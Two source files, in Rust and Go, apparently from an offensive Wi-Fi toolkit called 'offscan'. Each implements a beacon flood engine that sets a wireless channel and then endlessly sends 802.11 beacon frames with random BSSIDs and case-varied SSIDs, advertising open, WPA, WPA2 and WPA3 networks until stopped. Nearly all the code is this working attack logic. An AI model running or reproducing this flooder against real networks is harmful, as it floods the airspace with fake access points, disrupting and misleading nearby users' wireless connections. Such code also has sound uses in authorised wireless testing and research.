File: src/engines/flood_beacon/beacon_flood.rs
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::Arc;
use std::time::Instant;
use crate::engines::BcFloodArgs;
use crate::iface::{Iface, IfaceManager};
use crate::builders::Beacon;
use crate::sockets::Layer2Socket;
use crate::generators::RandomValues;
use crate::utils::{CtrlCHandler, abort, Bssid};



pub struct BeaconFlood {
    iface   : Iface,
    channel : u8,
    ssid    : String,
    bc_sent : usize,
    builder : Beacon,
    socket  : Layer2Socket,
}


impl BeaconFlood {

    pub fn new(args: BcFloodArgs) -> Self {
        Self { 
            bc_sent : 0,
            builder : Beacon::new(),
            socket  : Layer2Socket::new(&args.iface),
            iface   : args.iface,
            channel : args.channel as u8,
            ssid    : args.ssid,
        }
    }



    pub fn execute(&mut self) {
        self.set_channel();
        self.send_endlessly();
    }



    fn set_channel(&self) {
        if !IfaceManager::set_channel(self.iface.name(), self.channel as i32) {
            abort(
                format!(
                    "Uneable to set channel {} on interface {}", 
                    self.iface.name(),
                    self.channel
                )
            )
        }
    }



    fn send_endlessly(&mut self) {
        let mut rand = RandomValues::new(None, None); 
        let running  = Arc::new(AtomicBool::new(true));
        CtrlCHandler::setup(running.clone());

        let init = Instant::now();
        println!("[+] Sending beacons. Press CTRL + C to stop");

        while running.load(Ordering::SeqCst) {
            let bssid = rand.random_bssid();
            let ssid  = rand.random_case_inversion(&self.ssid);
            let seq   = rand.random_seq();
            
            self.send_quartet(bssid, &ssid, seq);
        }

        let time = init.elapsed().as_secs_f64();
        
        println!("\n[-] Flood interrupted"); 
        println!("[%] {} beacons sent in {:.2} seconds", &self.bc_sent, time);
    }



    fn send_quartet(
        &mut self,
        bssid : Bssid,
        ssid  : &str,
        seq   : u16
    ) {
        self.send_beacon(bssid, ssid, seq,     "open");
        self.send_beacon(bssid, ssid, seq + 1, "wpa");
        self.send_beacon(bssid, ssid, seq + 2, "wpa2");
        self.send_beacon(bssid, ssid, seq + 3, "wpa3");
    }



    #[inline]
    fn send_beacon(
        &mut self, 
        bssid : Bssid, 
        ssid  : &str,
        seq   : u16,
        sec   : &str
    ) {
        let beacon = self.builder.beacon(bssid, ssid, seq, self.channel, sec);

        self.socket.send(beacon);
        self.bc_sent += 1;
    }

}




impl crate::EngineTrait for BeaconFlood {
    type Args = BcFloodArgs;
    
    fn new(args: Self::Args) -> Self {
        BeaconFlood::new(args)
    }
    
    fn execute(&mut self) {
        self.execute();
    }
}

File: engines/beacon/beacon_flood.go
/*
 * Copyright (C) 2025 Oliver R. Calazans Jeronimo
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org>.
 */

package beacon

import (
	"fmt"
	"time"

	"offscan/internal/frame80211/builder"
	"offscan/internal/generators"
	"offscan/internal/sockets"
	"offscan/internal/sysconf"
	"offscan/internal/utils"
)



func Run(args []string) {
    newBeaconFlooder(args).execute()
}



type beaconFlood struct {
    channel   uint8
    ssid      string
    bcSent    int
    socket    sockets.Layer2Socket
    builder   builder.Beacon
    randGen  *generators.RandomValues
}



func newBeaconFlooder(argList []string) *beaconFlood {
    parser := newParser()
    parser.parseBcFloodArgs(argList)

    sysconf.MustSetChannel(parser.iface, parser.channel)

    return &beaconFlood{
        channel : uint8(parser.channel),
        ssid    : parser.ssid,
        bcSent  : 0,
        builder : builder.NewBeacon(),
        socket  : sockets.NewL2Socket(&parser.iface),
        randGen : generators.NewRandomValues(),
    }
}



func (bf *beaconFlood) execute() {
    ctx   := utils.SignalContext()
    start := time.Now()
    
	fmt.Println("[+] Sending beacons. Press Ctrl+C to stop")

    for {
        select {
        case <-ctx.Done():
            elapsed := time.Since(start).Seconds()
            bf.closeSocket()
            bf.displayExecInfo(elapsed)
            return

        default:
            bf.sendQuartet()
        }
    }
}



func (bf *beaconFlood) sendQuartet() {
    bf.setFixedInfo()
    bf.sendBeacon("open")
    bf.sendBeacon("wpa")
    bf.sendBeacon("wpa2")
    bf.sendBeacon("wpa3")
}



func (bf *beaconFlood) setFixedInfo() {
    bssid := bf.randGen.RandomMac()
    ssid  := bf.randGen.RandomCaseInversion(bf.ssid)

    bf.builder.SetSrcAddr(bssid)
    bf.builder.SetBSSID(bssid)
    bf.builder.SetSeqCtrl(bf.randGen.RandomSeq())
    bf.builder.SetBodyInfo(ssid, bf.channel)
}



func (bf *beaconFlood) sendBeacon(sec string) {
    bf.builder.SetSec(sec)
    beacon := bf.builder.Beacon()
    bf.socket.Send(beacon)
    bf.bcSent++
}



func (bf *beaconFlood) displayExecInfo(elapsed float64) {
    fmt.Printf("\n[-] Flood interrupted\n")
    fmt.Printf("[%%] %d beacons sent in %.2f seconds\n", bf.bcSent, elapsed)
}



func (bf *beaconFlood) closeSocket() {
    if err := bf.socket.Close(); err != nil {
        fmt.Printf("[!] Error closing socket: %v\n", err)
    }
}